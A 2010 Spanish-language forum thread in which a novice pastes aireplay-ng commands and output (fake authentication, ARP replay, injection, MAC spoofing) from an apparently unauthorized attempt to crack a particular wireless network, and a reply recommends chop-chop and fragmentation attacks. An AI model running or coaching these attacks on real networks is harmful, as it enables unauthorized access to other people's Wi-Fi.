Foro de elhacker.net

Seguridad Informática => Hacking Wireless => Mensaje iniciado por: PACHUCO83 en 17 Agosto 2010, 09:22 am



Título: red dificil de inyectar, alguna solucion?
Publicado por: PACHUCO83 en 17 Agosto 2010, 09:22 am
soy nuevecillo en esto de las auditorias, pero estoy haciendo mis pinitos leyendo y leyendo foros como este, he auditado un par de redes, pero, pero de los peros, estoy batallando mucho con una red en especial, use primero wifislax, y no podia asociarme, ahora estoy usando bt4 y me asocia y envia paquetes pero no suben los datas ni las arp, que estoy haciendo mal?
lo que hice con las redes que pude auditar es lo mismo que estoy haciendo con esta red, sera que esta mas protegida? o se me paso algo? copio y pego un fragmento de lo que estoy haciendo............                         
           

The interface MAC (MAC DE LA RED) doesn't match the specified MAC (-h).
        ifconfig wlan0 hw ether 00:11:22:33:44:55
08:33:41  Waiting for beacon frame (BSSID: MAC DE LA RED) on channel 7

08:33:41  Sending Authentication Request (Open System)

08:33:43  Sending Authentication Request (Open System) [ACK]
08:33:43  Authentication successful
08:33:43  Sending Association Request

08:33:48  Sending Authentication Request (Open System)

08:33:50  Sending Authentication Request (Open System)^C
root@bt:~# aireplay-ng -3 -b MAC DE LA RED -h 00:11:22:33:44:55 wlan0
The interface MAC (00:C0:CA:3E:BA:5F) doesn't match the specified MAC (-h).
        ifconfig wlan0 hw ether 00:11:22:33:44:55
08:36:11  Waiting for beacon frame (BSSID: MAC DE LA RED) on channel 7
Saving ARP requests in replay_arp-0817-083611.cap
You should also start airodump-ng to capture replies.
^Cad 1517 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)
root@bt:~# aireplay-ng -1 0 -a MAC DE LA RED -h 00:11:22:33:44:55 -e NOMBRE DE LA RED w
lan0
The interface MAC (00:C0:CA:3E:BA:5F) doesn't match the specified MAC (-h).
        ifconfig wlan0 hw ether 00:11:22:33:44:55
08:40:15  Waiting for beacon frame (BSSID: MAC DE LA RED) on channel 7

08:40:15  Sending Authentication Request (Open System) [ACK]
08:40:15  Authentication successful
08:40:15  Sending Association Request [ACK]
08:40:15  Got a deauthentication packet! (Waiting 3 seconds)

08:40:18  Sending Authentication Request (Open System)

08:40:20  Sending Authentication Request (Open System)^C
root@bt:~# aireplay-ng -1 0 -a MAC DE LA RED -h 00:11:22:33:44:55 -e NOMBRE DE LA RED w                                                            lan0
The interface MAC (00:C0:CA:3E:BA:5F) doesn't match the specified MAC (-h).
        ifconfig wlan0 hw ether 00:11:22:33:44:55
08:40:37  Waiting for beacon frame (BSSID: MAC DE LA RED) on channel 7

08:40:37  Sending Authentication Request (Open System) [ACK]
08:40:37  Authentication successful
08:40:37  Sending Association Request^C
root@bt:~# aireplay-ng -3 -b MAC DE LA RED wlan0
No source MAC (-h) specified. Using the device MAC (00:C0:CA:3E:BA:5F)
08:41:11  Waiting for beacon frame (BSSID: MAC DE LA RED) on channel 7
Saving ARP requests in replay_arp-0817-084111.cap
You should also start airodump-ng to capture replies.
^Cad 3101 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)
root@bt:~# aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b MAC DE LA RED -h 00:11:22:33:44:55 wlan0
The interface MAC (00:C0:CA:3E:BA:5F) doesn't match the specified MAC (-h).
        ifconfig wlan0 hw ether 00:11:22:33:44:55
^Cad 551 packets...


Título: Re: red dificil de inyectar, alguna solucion?
Publicado por: Debci en 17 Agosto 2010, 12:30 pm
A veces necesitas un impulso...
Mira lo mejor seria que hicieses un ataque chop chop korek o un fragmentation, te dejo info de como hacerlo aqui:

Fragmentation:
Informacion sobre el ataque basico (http://www.aircrack-ng.org/doku.php?id=es:fragmentation)
El ataque completo (Muy importante) (http://www.aircrack-ng.org/doku.php?id=es:packetforge-ng)

Y aqui el chop chop korek:
Ataque Chop-Chop Korek (http://www.aircrack-ng.org/doku.php?id=es:korek_chopchop)

Saludos y suerte